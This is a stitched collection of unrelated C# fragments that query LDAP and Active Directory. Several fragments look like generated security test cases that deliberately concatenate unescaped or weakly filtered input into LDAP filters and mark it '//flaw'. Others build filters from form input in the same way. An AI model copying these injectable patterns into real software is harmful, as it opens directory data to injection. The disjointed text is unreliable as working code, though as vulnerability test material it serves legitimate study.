Console.WriteLine(ex.Message);
Console.WriteLine("[!] \nFailed...");
return;
}
}
}
public static void Main(string[] args)
{
string tainted_2 = null;
string tainted_3 = null;
string tainted_1 = null;
tainted_1 = args[1];
tainted_3 = tainted_1;
string[] arr_1 = new string[4]; // declaring array
//Storing value in array element
arr_1[0] = null;
arr_1[1] = null;
arr_1[2] = null;
arr_1[3] = tainted_1;
foreach (string val_1 in arr_1)
{
if (val_1 != null)
{
tainted_2 = val_1;
string pattern = @"/^[0-9]*$/";
Regex r = new Regex(pattern);
Match m = r.Match(tainted_2);
if (!m.Success)
{
tainted_3 = "";
}
else
{
tainted_3 = tainted_2;
}
}
}
//flaw
string query = "(&(objectClass=person)(sn=" + tainted_3 + "))";
string strConnect = "LDAP://my.site.com/o=site,c=com";
using (System.DirectoryServices.DirectoryEntry CN_Main = new System.DirectoryServices.DirectoryEntry(strConnect)){
string strResult = "";
System.DirectoryServices.DirectorySearcher DirSearcher = new System.DirectoryServices.DirectorySearcher(CN_Main, query);
System.DirectoryServices.DirectoryEntry CN_Result;
CN_Main.AuthenticationType = AuthenticationTypes.None;
foreach (System.DirectoryServices.SearchResult ResultSearch in DirSearcher.FindAll())
{
if (ResultSearch != null)
{
CN_Result = ResultSearch.GetDirectoryEntry();
if ((string)CN_Result.Properties["userclass"][0] == "noname")
{
strResult = strResult + "Name : " + CN_Result.InvokeGet("sn");
}
}
}
Console.WriteLine(strResult);
}
}
private void InitializeComponent()
{
this.directorySearcher1 = new System.DirectoryServices.DirectorySearcher();
this.button1 = new System.Windows.Forms.Button();
this.button2 = new System.Windows.Forms.Button();
this.button3 = new System.Windows.Forms.Button();
this.pictureBox1 = new System.Windows.Forms.PictureBox();
this.SuspendLayout();
//
// directorySearcher1
//
this.directorySearcher1.ClientTimeout = System.TimeSpan.Parse("-00:00:01");
this.directorySearcher1.ServerPageTimeLimit = System.TimeSpan.Parse("-00:00:01");
this.directorySearcher1.ServerTimeLimit = System.TimeSpan.Parse("-00:00:01");
//
// button1
//
this.button1.Location = new System.Drawing.Point(10, 522);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(200, 200);
this.button1.TabIndex = 3;
this.button1.Text = "button1";
this.button1.UseVisualStyleBackColor = true;
this.button1.Click += new System.EventHandler(this.button1_Click);
this.pictureBox1.Location = new System.Drawing.Point(10, 10);
this.pictureBox1.Name = "pictureBox1";
const string PfadBild = @"./../../Kaffeefleck.jpg";
StreamReader SR = new StreamReader(PfadBild);
Bitmap Bild = new Bitmap(SR.BaseStream);
SR.Close();
int minX = Bild.Width, maxX = 0, minY = Bild.Height, maxY = 0;
for (int x = 0; x < Bild.Width; x++)
{
for (int y = 0; y < Bild.Height; y++)
{
if ((Bild.GetPixel(x, y).ToArgb() * 100 / -16777216) >= 2)
{
//Färbe Rot ein, wenn nicht weiß
Bild.SetPixel(x, y, Color.FromArgb(Bild.GetPixel(x, y).R, 40, 40));
if (x < minX)
{
minX = x;
}
if (x > maxX)
{
maxX = x;
}
if (y < minY)
{
minY = y;
}
if (y > maxY)
{
maxY = y;
}
}
}
}
/* TODO: Male Kasten um Fleck */
for (int x = minX; x < maxX; x++)
{
for (int y = (minY - 1); y < minY; y++)
{
Bild.SetPixel(x, y, Color.FromArgb(40, 40, 40));
}
}
for (int x = minX; x < maxX; x++)
{
for (int y = maxY; y < (maxY + 1); y++)
{
Bild.SetPixel(x, y, Color.FromArgb(40, 40, 40));
}
}
for (int x = (minX - 1); x < minX; x++)
{
for (int y = minY; y < maxY; y++)
{
Bild.SetPixel(x, y, Color.FromArgb(40, 40, 40));
}
}
for (int x = maxX; x < (maxX + 1); x++)
{
for (int y = minY; y < maxY; y++)
{
Bild.SetPixel(x, y, Color.FromArgb(40, 40, 40));
}
}
this.pictureBox1.Size = new System.Drawing.Size(Bild.Size.Width, Bild.Size.Height);
this.pictureBox1.Image = Bild;
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(711, 600);
//this.Controls.Add(this.button1);
this.Controls.Add(this.pictureBox1);
this.Name = "Form1";
this.Text = "Form1";
this.Load += new System.EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
internal SearchResultCollection(DirectoryEntry root, IntPtr searchHandle, string[] propertiesLoaded, DirectorySearcher srch)
{
_handle = searchHandle;
PropertiesLoaded = propertiesLoaded;
Filter = srch.Filter;
_rootEntry = root;
this.srch = srch;
}
public ADCache(string path)
{
try
{
DateTime start = DateTime.Now;
string[] properties = new string[] { "samAccountName", "objectClass", "canonicalName", "objectSID", "distinguishedName" };
string filter = "(|(objectClass=user)(objectClass=group))";
Console.WriteLine("Connecting to {0}...", path);
DirectoryEntry directoryEntry;
try
{
directoryEntry = new DirectoryEntry(path);
directoryEntry.RefreshCache(properties);
}
catch
{
string username = "";
string password = "";
ConsoleColor foregroundColor = Console.ForegroundColor;
ConsoleColor backgroundColor = Console.BackgroundColor;
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("Current user context is not allowed to read from AD.");
Console.WriteLine("Please provide user credentials entitled to read from {0}.", path);
Console.ForegroundColor = foregroundColor;
Console.Write("Enter username: "******"Enter password: "******"Reading all ad user and group objects...");
DirectorySearcher ds = new System.DirectoryServices.DirectorySearcher(directoryEntry, filter, properties);
ds.SearchScope = SearchScope.Subtree;
ds.CacheResults = true;
ds.ClientTimeout = TimeSpan.FromMinutes(120);
ds.PageSize = 100;
SearchResultCollection entries = ds.FindAll();
foreach (SearchResult entry in entries)
{
System.Security.Principal.SecurityIdentifier binSID = new System.Security.Principal.SecurityIdentifier((byte[])entry.Properties["objectSID"][0], 0);
string sid = binSID.ToString();
string samAccountName = entry.Properties["samAccountName"][0].ToString();
//Console.WriteLine("{0} - {1}", sid, samAccountName);
Console.Write("\r{0} objects read..", cache.Count);
if (!cache.ContainsKey(sid))
{
cache.Add(sid, new Properties(sid, entry));
}
}
Console.WriteLine("\r{0} objects found. Loading AD took actually {1}", cache.Count, (DateTime.Now - start).ToString());
}
catch (Exception e)
{
Console.WriteLine("Reading AD failed: {0}", e.Message);
throw new Exception("Reading AD failed.");
}
}
public static void Main(string[] args)
{
string tainted_2 = null;
string tainted_3 = null;
string tainted_1 = null;
Process process = new Process();
process.StartInfo.FileName = "/bin/bash";
process.StartInfo.Arguments = "-c 'cat /tmp/tainted.txt'";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
using (StreamReader reader = process.StandardOutput) {
tainted_1 = reader.ReadToEnd();
process.WaitForExit();
process.Close();
}
tainted_3 = tainted_1;
string[] arr_1 = new string[4]; // declaring array
//Storing value in array element
arr_1[0] = null;
arr_1[1] = null;
arr_1[2] = null;
arr_1[3] = tainted_1;
foreach (string val_1 in arr_1)
{
if (val_1 != null)
{
tainted_2 = val_1;
StringBuilder text = new StringBuilder(tainted_2);
text.Replace("&", "&");
text.Replace("'", "'");
text.Replace(@"""", """);
text.Replace("<", "<");
text.Replace(">", ">");
tainted_3 = text.ToString();
}
}
//flaw
string query = "(&(objectClass=person)(sn=" + tainted_3 + "))";
string strConnect = "LDAP://my.site.com/o=site,c=com";
using (System.DirectoryServices.DirectoryEntry CN_Main = new System.DirectoryServices.DirectoryEntry(strConnect)){
string strResult = "";
System.DirectoryServices.DirectorySearcher DirSearcher = new System.DirectoryServices.DirectorySearcher(CN_Main, query);
System.DirectoryServices.DirectoryEntry CN_Result;
CN_Main.AuthenticationType = AuthenticationTypes.None;
foreach (System.DirectoryServices.SearchResult ResultSearch in DirSearcher.FindAll())
{
if (ResultSearch != null)
{
CN_Result = ResultSearch.GetDirectoryEntry();
if ((string)CN_Result.Properties["userclass"][0] == "noname")
{
strResult = strResult + "Name : " + CN_Result.InvokeGet("sn");
}
}
}
Console.WriteLine(strResult);
}
}
private static void LoadFromActiveDirectory()
{
string domainName = "LDAP://ou=osl,dc=win,dc=lottery,dc=state,dc=or,dc=us";
AD.DirectoryEntry dirEntry = new AD.DirectoryEntry();
AD.DirectorySearcher searcher;
dirEntry.Path = domainName;
dirEntry.AuthenticationType = AD.AuthenticationTypes.Secure;
searcher = new AD.DirectorySearcher();
searcher.SearchRoot = dirEntry;
searcher.SearchScope = AD.SearchScope.Subtree;
//searcher.Filter = "(&(objectCategory=person)(sAMAccountName=*))";
searcher.Filter = "(&(objectCategory=person))";
AD.SearchResultCollection results = searcher.FindAll();
foreach (AD.SearchResult sr in results)
{
string adName = "";
string adDepartment = "";
string employeeId = "";
string emailaddr = "";
AD.ResultPropertyValueCollection departments = sr.Properties["department"];
if (departments != null && departments.Count > 0)
{
adDepartment = departments[0].ToString();
}
AD.ResultPropertyValueCollection employeeIds = sr.Properties["employeeid"];
if (employeeIds != null && employeeIds.Count > 0)
{
employeeId = (string)employeeIds[0];
}
AD.ResultPropertyValueCollection names = sr.Properties["Name"];
if (names != null && names.Count > 0)
{
adName = (string)names[0];
}
if (!string.IsNullOrEmpty(adName) && !string.IsNullOrEmpty(adDepartment))
// Some non-security lottery staff do NOT have employee ID in Active Directory!
// ALL OSP staff do NOT have an employee ID.
// (
// !string.IsNullOrEmpty(employeeId) || (adDepartment.ToLower() == "security")
// )
// )
{
if (!adName.ToLower().Contains("-adm"))
{
AD.ResultPropertyValueCollection emails = sr.Properties["mail"];
if (emails != null && emails.Count > 0)
{
emailaddr = (string)emails[0];
}
if (!string.IsNullOrEmpty(adName))
{
if (adDepartment.ToLower() == "information technology" || adDepartment.StartsWith("IT"))
{
_ITPersonNames.Add(adName);
if (!string.IsNullOrEmpty(emailaddr))
{
_ITEmailAddresses.Add(emailaddr);
}
}
}
if (!string.IsNullOrEmpty(emailaddr))
{
_AllEmailAddresses.Add(emailaddr);
}
}
}
}
}
/// <summary>
/// To bind active directory records in user details grid
/// </summary>
public void BindUser()
{
DataTable DtBindUser = new DataTable();
DataColumn Dtmail = new DataColumn("mail");
DataColumn Dtfname = new DataColumn("fname");
DataColumn Dtlname = new DataColumn("lname");
DataColumn DtdisplayName = new DataColumn("displayName");
DtBindUser.Columns.Add(Dtmail);
DtBindUser.Columns.Add(Dtfname);
DtBindUser.Columns.Add(Dtlname);
DtBindUser.Columns.Add(DtdisplayName);
DataRow Druser;
// Added connection string for active directory user
string connection = ConfigurationManager.ConnectionStrings["ADConnection"].ToString();
DirectorySearcher DsSearch = new DirectorySearcher(connection);
// declaired domain from which you want to fetch active directory users
DirectoryEntry UserDomain = new DirectoryEntry("LDAP://DC=kpmg,DC=aptaracorp,DC=com");
DirectorySearcher Usersearch = new DirectorySearcher(connection);
DsSearch.SearchRoot = UserDomain;
DsSearch.SearchScope = SearchScope.Subtree;
SearchResultCollection UserResult;
//Applied Filter On User For Specific Fname and Lname
Usersearch.Filter = "(&(objectClass=user)(sn=" + txtLastName.Text + "*)(givenName=" + txtFName.Text + "*))";
UserResult = Usersearch.FindAll();
for (int i = 0; i < UserResult.Count; i++)
{
string AccounName = UserResult[i].Properties["samaccountname"][0].ToString();
DirectorySearcher DrSearcher = new System.DirectoryServices.DirectorySearcher("(samaccountname=" + AccounName + ")");
SearchResult SrchRes = DrSearcher.FindOne();
DirectoryEntry DrEntry = SrchRes.GetDirectoryEntry();
try
{
if (DrEntry.Properties["givenName"][0].ToString() != "")
{
string FirstName = DrEntry.Properties["givenName"][0].ToString();
string LastName = DrEntry.Properties["sn"][0].ToString();
string UserEmail = DrEntry.Properties["mail"][0].ToString();
string UserDisName = DrEntry.Properties["displayName"][0].ToString();
Druser = DtBindUser.NewRow();
Druser["mail"] = UserEmail.ToString();
Druser["fname"] = FirstName.ToString();
Druser["lname"] = LastName.ToString();
Druser["displayName"] = UserDisName.ToString();
DtBindUser.Rows.Add(Druser);
}
}
catch
{
////throw;
}
}
if (DtBindUser.Rows.Count > 0)
{
grdUserDetails.DataSource = DtBindUser;
grdUserDetails.DataBind();
}
}
public string validarUsuario(string usuario, string clave, string dominio)
{
string rpta = "";
DirectoryEntry domain = new DirectoryEntry(dominio);
//DirectoryEntry domain = new DirectoryEntry("LDAP://" + dominio);
using (DirectorySearcher Searcher = new DirectorySearcher(dominio))
{
//Searcher.Filter = "(&(objectCategory=user)(ANR=" + usuario + " * ))"; // busca todas las cuentas que se parezcan
Searcher.Filter = "(SAMAccountName=" + usuario + ")"; // "(SAMAccountName=" & usuario & ")"; // filtra por usuario especifico
Searcher.SearchScope = SearchScope.Subtree; // Start at the top and keep drilling down
Searcher.PropertiesToLoad.Add("sAMAccountName"); // Load User ID
Searcher.PropertiesToLoad.Add("displayName"); // Load Display Name
Searcher.PropertiesToLoad.Add("givenName"); // Load Users first name
Searcher.PropertiesToLoad.Add("sn"); // Load Users last name
Searcher.PropertiesToLoad.Add("distinguishedName"); // Users Distinguished name
Searcher.PropertiesToLoad.Add("proxyAddresses"); // correo del usuario
Searcher.PropertiesToLoad.Add("department"); // area de trabajo
Searcher.PropertiesToLoad.Add("title"); // rol del usuario
Searcher.PropertiesToLoad.Add("userAccountControl"); // Users Distinguished name
Searcher.Sort.PropertyName = "sAMAccountName"; // Sort by user ID
Searcher.Sort.Direction = System.DirectoryServices.SortDirection.Ascending; // A-Zt)
using (var users = Searcher.FindAll()) // Users contains our searh results
{
if (users.Count > 0)
{
foreach (SearchResult User in users) // goes throug each user in the search resultsg
{
//Ambito._estCuentaUsuario = Convert.ToInt32(User.Properties["userAccountControl"][0]);
//int flagExists = Ambito._estCuentaUsuario & 0x2;
//if (flagExists > 0)
//{
// rpta = "La cuenta de usuario se encuentra deshabilitada";
//}
System.DirectoryServices.DirectoryEntry Entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + dominio, usuario, clave);
System.DirectoryServices.DirectorySearcher valSearcher = new System.DirectoryServices.DirectorySearcher(Entry);
valSearcher.SearchScope = System.DirectoryServices.SearchScope.OneLevel;
try
{
System.DirectoryServices.SearchResult Results = valSearcher.FindOne();
}
catch (Exception ex)
{
rpta = ex.Message;
return(rpta);
}
//if (User.Properties.Contains("displayName"))
//{
// Ambito._NombreUsuario = System.Convert.ToString(User.Properties["displayName"][0]);
//}
//if (User.Properties.Contains("title"))
//{
// Ambito._rolUsuario = System.Convert.ToString(User.Properties["title"][0]);
//}
//if (User.Properties.Contains("title"))
//{
// Ambito._dptoUsuario = System.Convert.ToString(User.Properties["title"][0]);
//}
//if (User.Properties.Contains("proxyAddresses"))
//{
// Ambito._correoUsuario = System.Convert.ToString(User.Properties["proxyAddresses"][0]);
//}
//if (User.Properties.Contains("sAMAccountName"))
//{
// Ambito.Usuario = System.Convert.ToString(User.Properties["sAMAccountName"][0]).ToUpper();
//}
rpta = "OK";
}
}
else
{
rpta = "ER";
}
}
}
return(rpta);
}
public static void Main(string[] args)
{
string tainted_0 = null;
string tainted_1 = null;
tainted_0 = Console.ReadLine();
tainted_1 = tainted_0;
StringBuilder escape = new StringBuilder();
for (int i = 0; i < tainted_0.Length; ++i)
{
char current = tainted_0[i];
switch (current)
{
case '\\':
escape.Append(@"\5c");
break;
case '*':
escape.Append(@"\2a");
break;
case '(':
escape.Append(@"\28");
break;
case ')':
escape.Append(@"\29");
break;
case '\u0000':
escape.Append(@"\00");
break;
case '/':
escape.Append(@"\2f");
break;
default:
escape.Append(current);
break;
}
}
tainted_1 = escape.ToString();
string query = "(&(objectClass=person)(sn=" + tainted_1 + "))";
string strConnect = "LDAP://my.site.com/o=site,c=com";
using (System.DirectoryServices.DirectoryEntry CN_Main = new System.DirectoryServices.DirectoryEntry(strConnect)){
string strResult = "";
System.DirectoryServices.DirectorySearcher DirSearcher = new System.DirectoryServices.DirectorySearcher(CN_Main, query);
System.DirectoryServices.DirectoryEntry CN_Result;
CN_Main.AuthenticationType = AuthenticationTypes.None;
foreach (System.DirectoryServices.SearchResult ResultSearch in DirSearcher.FindAll())
{
if (ResultSearch != null)
{
CN_Result = ResultSearch.GetDirectoryEntry();
if ((string)CN_Result.Properties["userclass"][0] == "noname")
{
strResult = strResult + "Name : " + CN_Result.InvokeGet("sn");
}
}
}
Console.WriteLine(strResult);
}
}
public static void Main(string[] args)
{
string tainted_2 = null;
string tainted_3 = null;
Process process = new Process();
process.StartInfo.FileName = "/bin/bash";
process.StartInfo.Arguments = "-c 'cat /tmp/tainted.txt'";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
using (StreamReader reader = process.StandardOutput) {
tainted_2 = reader.ReadToEnd();
process.WaitForExit();
process.Close();
}
tainted_3 = tainted_2;
if ((Math.Pow(4, 2) <= 42))
{
{}
}
else
{
string pattern = @"/^[0-9]*$/";
Regex r = new Regex(pattern);
Match m = r.Match(tainted_2);
if (!m.Success)
{
tainted_3 = "";
}
else
{
tainted_3 = tainted_2;
}
}
//flaw
string query = "(&(objectClass=person)(sn=" + tainted_3 + "))";
string strConnect = "LDAP://my.site.com/o=site,c=com";
using (System.DirectoryServices.DirectoryEntry CN_Main = new System.DirectoryServices.DirectoryEntry(strConnect)){
string strResult = "";
System.DirectoryServices.DirectorySearcher DirSearcher = new System.DirectoryServices.DirectorySearcher(CN_Main, query);
System.DirectoryServices.DirectoryEntry CN_Result;
CN_Main.AuthenticationType = AuthenticationTypes.None;
foreach (System.DirectoryServices.SearchResult ResultSearch in DirSearcher.FindAll())
{
if (ResultSearch != null)
{
CN_Result = ResultSearch.GetDirectoryEntry();
if ((string)CN_Result.Properties["userclass"][0] == "noname")
{
strResult = strResult + "Name : " + CN_Result.InvokeGet("sn");
}
}
}
Console.WriteLine(strResult);
}
}
public static void Main(string[] args)
{
string tainted_2 = null;
string tainted_3 = null;
Process process = new Process();
process.StartInfo.FileName = "/bin/bash";
process.StartInfo.Arguments = "-c 'cat /tmp/tainted.txt'";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
using (StreamReader reader = process.StandardOutput) {
tainted_2 = reader.ReadToEnd();
process.WaitForExit();
process.Close();
}
tainted_3 = tainted_2;
if ((1 == 1))
{
StringBuilder escape = new StringBuilder();
for (int i = 0; i < tainted_2.Length; ++i)
{
char current = tainted_2[i];
switch (current)
{
case '\\':
escape.Append(@"\5c");
break;
case '*':
escape.Append(@"\2a");
break;
case '(':
escape.Append(@"\28");
break;
case ')':
escape.Append(@"\29");
break;
case '\u0000':
escape.Append(@"\00");
break;
case '/':
escape.Append(@"\2f");
break;
default:
escape.Append(current);
break;
}
}
tainted_3 = escape.ToString();
}
else if (!(1 == 1))
{
{}
}
else
{
{}
}
string query = "(&(objectClass=person)(sn=" + tainted_3 + "))";
string strConnect = "LDAP://my.site.com/o=site,c=com";
using (System.DirectoryServices.DirectoryEntry CN_Main = new System.DirectoryServices.DirectoryEntry(strConnect)){
string strResult = "";
System.DirectoryServices.DirectorySearcher DirSearcher = new System.DirectoryServices.DirectorySearcher(CN_Main, query);
System.DirectoryServices.DirectoryEntry CN_Result;
CN_Main.AuthenticationType = AuthenticationTypes.None;
foreach (System.DirectoryServices.SearchResult ResultSearch in DirSearcher.FindAll())
{
if (ResultSearch != null)
{
CN_Result = ResultSearch.GetDirectoryEntry();
if ((string)CN_Result.Properties["userclass"][0] == "noname")
{
strResult = strResult + "Name : " + CN_Result.InvokeGet("sn");
}
}
}
Console.WriteLine(strResult);
}
}
/* connect ldap server & create an searcher object */
public static System.DirectoryServices.DirectorySearcher Get_DomainSearcher(Args_Get_DomainSearcher args = null)
{
if (args == null)
{
args = new Args_Get_DomainSearcher();
}
string TargetDomain = null;
string BindServer = null;
var userDnsDomain = Environment.GetEnvironmentVariable("USERDNSDOMAIN");
if (args.Domain.IsNotNullOrEmpty())
{
TargetDomain = args.Domain;
if (userDnsDomain != null && userDnsDomain.Trim() != "")
{
// see if we can grab the user DNS logon domain from environment variables
var UserDomain = userDnsDomain;
var logonServer = Environment.GetEnvironmentVariable("LOGONSERVER");
if (logonServer != null && logonServer.Trim() != "" && UserDomain.IsNotNullOrEmpty())
{
BindServer = $"{logonServer.Replace(@"\\", "")}.{UserDomain}";
}
}
}
else if (args.Credential != null)
{
// if not -Domain is specified, but -Credential is, try to retrieve the current domain name with Get-Domain
var DomainObject = GetDomain.Get_Domain(new Args_Get_Domain {
Credential = args.Credential
});
BindServer = DomainObject.PdcRoleOwner.Name;
TargetDomain = DomainObject.Name;
}
else if (userDnsDomain != null && userDnsDomain.Trim() != "")
{
// see if we can grab the user DNS logon domain from environment variables
TargetDomain = userDnsDomain;
var logonServer = Environment.GetEnvironmentVariable("LOGONSERVER");
if (logonServer != null && logonServer.Trim() != "" && TargetDomain.IsNotNullOrEmpty())
{
BindServer = $"{logonServer.Replace(@"\\", "")}.{TargetDomain}";
}
}
else
{
// otherwise, resort to Get-Domain to retrieve the current domain object
var DomainObject = GetDomain.Get_Domain();
if (DomainObject == null)
{
System.Environment.Exit(0);
}
BindServer = DomainObject.PdcRoleOwner.Name;
TargetDomain = DomainObject.Name;
}
if (args.Server.IsNotNullOrEmpty())
{
// if there's not a specified server to bind to, try to pull a logon server from ENV variables
BindServer = args.Server;
}
var SearchString = "LDAP://";
if (BindServer != null && BindServer.Trim() != "")
{
SearchString += BindServer;
if (TargetDomain.IsNotNullOrEmpty())
{
SearchString += '/';
}
}
if (args.SearchBasePrefix.IsNotNullOrEmpty())
{
SearchString += args.SearchBasePrefix + @",";
}
var DN = string.Empty;
if (args.SearchBase.IsNotNullOrEmpty())
{
if (new Regex(@"^GC://").Match(args.SearchBase).Success)
{
// if we're searching the global catalog, get the path in the right format
DN = args.SearchBase.ToUpper().Trim('/');
SearchString = string.Empty;
}
else
{
if (new Regex(@"^LDAP://").Match(args.SearchBase).Success)
{
if (new Regex(@"LDAP://.+/.+").Match(args.SearchBase).Success)
{
SearchString = string.Empty;
DN = args.SearchBase;
}
else
{
DN = args.SearchBase.Substring(7);
}
}
else
{
DN = args.SearchBase;
}
}
}
else
{
// transform the target domain name into a distinguishedName if an ADS search base is not specified
if (TargetDomain != null && TargetDomain.Trim() != "")
{
DN = $"DC={TargetDomain.Replace(".", ",DC=")}";
}
}
SearchString += DN;
Logger.Write_Verbose($@"[Get-DomainSearcher] search base: {SearchString}");
System.DirectoryServices.DirectorySearcher Searcher = null;
if (args.Credential != null)
{
Logger.Write_Verbose(@"[Get-DomainSearcher] Using alternate credentials for LDAP connection");
// bind to the inital search object using alternate credentials
var DomainObject = new System.DirectoryServices.DirectoryEntry(SearchString, args.Credential.UserName, args.Credential.Password);
Searcher = new System.DirectoryServices.DirectorySearcher(DomainObject);
}
else
{
// bind to the inital object using the current credentials
//Searcher = new System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
var DomainObject = new System.DirectoryServices.DirectoryEntry(SearchString);
Searcher = new System.DirectoryServices.DirectorySearcher(DomainObject);
}
Searcher.PageSize = args.ResultPageSize;
Searcher.SearchScope = args.SearchScope;
Searcher.CacheResults = false;
Searcher.ReferralChasing = System.DirectoryServices.ReferralChasingOption.All;
if (args.ServerTimeLimit != null)
{
Searcher.ServerTimeLimit = new TimeSpan(0, 0, args.ServerTimeLimit.Value);
}
if (args.Tombstone)
{
Searcher.Tombstone = true;
}
if (args.LDAPFilter.IsNotNullOrWhiteSpace())
{
Searcher.Filter = args.LDAPFilter;
}
if (args.SecurityMasks != null)
{
Searcher.SecurityMasks = args.SecurityMasks.Value;
}
if (args.Properties != null)
{
// handle an array of properties to load w/ the possibility of comma-separated strings
var PropertiesToLoad = new List <string>();
foreach (var item in args.Properties)
{
PropertiesToLoad.AddRange(item.Split(','));
}
Searcher.PropertiesToLoad.AddRange(PropertiesToLoad.ToArray());
}
return(Searcher);
}
public static void Main(string[] args)
{
string tainted_2 = null;
string tainted_3 = null;
Process process = new Process();
process.StartInfo.FileName = "/bin/bash";
process.StartInfo.Arguments = "-c 'cat /tmp/tainted.txt'";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
using (StreamReader reader = process.StandardOutput) {
tainted_2 = reader.ReadToEnd();
process.WaitForExit();
process.Close();
}
tainted_3 = tainted_2;
if ((Math.Sqrt(42) >= 42))
{
string regexSearch = new string(Path.GetInvalidFileNameChars()) + new string(Path.GetInvalidPathChars()) + ";";
Regex r = new Regex(string.Format("[{0}]", Regex.Escape(regexSearch)));
tainted_3 = r.Replace(tainted_2, "");
}
else if (!(Math.Sqrt(42) >= 42))
{
{}
}
else
{
{}
}
//flaw
string query = "(&(objectClass=person)(sn=" + tainted_3 + "))";
string strConnect = "LDAP://my.site.com/o=site,c=com";
using (System.DirectoryServices.DirectoryEntry CN_Main = new System.DirectoryServices.DirectoryEntry(strConnect)){
string strResult = "";
System.DirectoryServices.DirectorySearcher DirSearcher = new System.DirectoryServices.DirectorySearcher(CN_Main, query);
System.DirectoryServices.DirectoryEntry CN_Result;
CN_Main.AuthenticationType = AuthenticationTypes.None;
foreach (System.DirectoryServices.SearchResult ResultSearch in DirSearcher.FindAll())
{
if (ResultSearch != null)
{
CN_Result = ResultSearch.GetDirectoryEntry();
if ((string)CN_Result.Properties["userclass"][0] == "noname")
{
strResult = strResult + "Name : " + CN_Result.InvokeGet("sn");
}
}
}
Console.WriteLine(strResult);
}
}
public List <ADUser> SearchAD(String FirstName, String LastName, Boolean ForUser, int AuditUserID)
{
List <ADUser> lstUsers = new List <ADUser>();
String Domain = db.Parameters.AsNoTracking().Where(p => p.ParamName == "ADDomain").FirstOrDefault().ParamValue;
Parameter adminName = db.Parameters.AsNoTracking().Where(p => p.ParamName == "ADUsername").FirstOrDefault();
Parameter password = db.Parameters.AsNoTracking().Where(p => p.ParamName == "ADPassword").FirstOrDefault();
password.ParamValue = util.Decrypt(password.ParamValue);
string strRootForest = "LDAP://" + Domain;
System.DirectoryServices.DirectoryEntry root = new System.DirectoryServices.DirectoryEntry(strRootForest, adminName.ParamValue, password.ParamValue);
System.DirectoryServices.DirectorySearcher searcher = new System.DirectoryServices.DirectorySearcher(root);
searcher.SearchScope = SearchScope.Subtree;
searcher.ReferralChasing = ReferralChasingOption.All;
string vbSearchCriteria = null;
if (!(string.IsNullOrEmpty(FirstName)))
{
vbSearchCriteria = vbSearchCriteria + "(givenName=" + FirstName.TrimStart().TrimEnd() + "*)";
}
if (!(string.IsNullOrEmpty(LastName)))
{
vbSearchCriteria = vbSearchCriteria + "(sn=" + LastName.TrimStart().TrimEnd() + "*)";
}
searcher.Filter = "(&(objectClass=user)" + vbSearchCriteria + ")";
SearchResultCollection vbResults = searcher.FindAll();
int vbCount = vbResults.Count;
if (vbCount == 0)
{
throw new Exception("Account cannot be found in Active Directory.");
}
for (int i = 0; i <= vbCount - 1; i++)
{
SearchResult result = vbResults[i];
System.DirectoryServices.DirectoryEntry ADsObject = result.GetDirectoryEntry();
string vbUsername = Domain + "\\" + result.Properties["sAMAccountName"][0].ToString();
string vbFname = "";
string vbLname = "";
string vbEmail = "";
string vbEmpNum = "";
string vbManagerPath = "";
Guid vbManagerGUID;
int? vbManagerID = null;
if (result.Properties["givenName"].Count > 0)
{
vbFname = result.Properties["givenName"][0].ToString();
}
if (result.Properties["sn"].Count > 0)
{
vbLname = result.Properties["sn"][0].ToString();
}
if (result.Properties["mail"].Count > 0)
{
vbEmail = result.Properties["mail"][0].ToString();
}
if (result.Properties["employeeNumber"].Count > 0)
{
vbEmpNum = result.Properties["employeeNumber"][0].ToString();
}
if (result.Properties["manager"].Count > 0)
{
vbManagerPath = result.Properties["manager"][0].ToString();
vbManagerGUID = GetUserByPath(vbManagerPath).Guid;
AddMissingManagers(vbManagerPath, AuditUserID);
Employee manager = db.Employees.Where(e => e.ADGUID == vbManagerGUID).FirstOrDefault();
vbManagerID = manager.EmpID;
}
Boolean isAManger = IsAManager(result.Properties["distinguishedName"][0].ToString(), adminName.ParamValue, password.ParamValue, Domain);
ADUser user = new ADUser();
user.Username = vbUsername.Replace(Domain + "\\", "");
user.FirstName = vbFname;
user.LastName = vbLname;
user.Email = vbEmail;
user.ADGUID = ADsObject.Guid.ToString();
user.ManagerID = vbManagerID;
user.EmpNum = vbEmpNum;
user.IsManager = isAManger;
user.ManagerPath = vbManagerPath;
lstUsers.Add(user);
}
for (int i = 0; i <= lstUsers.Count - 1; i++)
{
string username = lstUsers[i].Username.Replace(Domain + "\\", "").ToString().ToUpper().TrimEnd();
if (ForUser == true)
{
List <User> lstExistingUsers = db.Users.ToList();
if (lstExistingUsers.Any(s => s.Username.ToString().ToUpper().TrimEnd() == username))
{
lstUsers[i].Exists = true;
}
else
{
lstUsers[i].Exists = false;
}
}
else
{
List <Employee> lstExistingEmps = db.Employees.ToList();
if (lstExistingEmps.Any(s => s.Username.ToString().ToUpper().TrimEnd() == username))
{
lstUsers[i].Exists = true;
}
else
{
lstUsers[i].Exists = false;
}
}
}
return(lstUsers);
}
private void GetUsedAttributes(string objectDn)
{
// Get the currently connected LDAP context
System.DirectoryServices.DirectoryEntry entry1 = new System.DirectoryServices.DirectoryEntry("LDAP://RootDSE");
string domainContext = entry1.Properties["defaultNamingContext"].Value as string;
// Use the default naming context as the connected context may not work for searches
System.DirectoryServices.DirectoryEntry entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + domainContext);
System.DirectoryServices.DirectorySearcher adSearch = new System.DirectoryServices.DirectorySearcher(entry);
adSearch.Filter = "(&((&(objectCategory=Person)(objectClass=User)))(samaccountname=" + objectDn + "))";
adSearch.SearchScope = SearchScope.Subtree;
//adSearch.Filter = "(&(objectClass=user)(anr=" + objectDn + "))";
string[] requiredProperties = new string[] { "cn", "userprincipalname", "physicaldeliveryofficename", "distinguishedname", "telephonenumber", "mail", "title", "department", "adspath" };
foreach (String property in requiredProperties)
{
adSearch.PropertiesToLoad.Add(property);
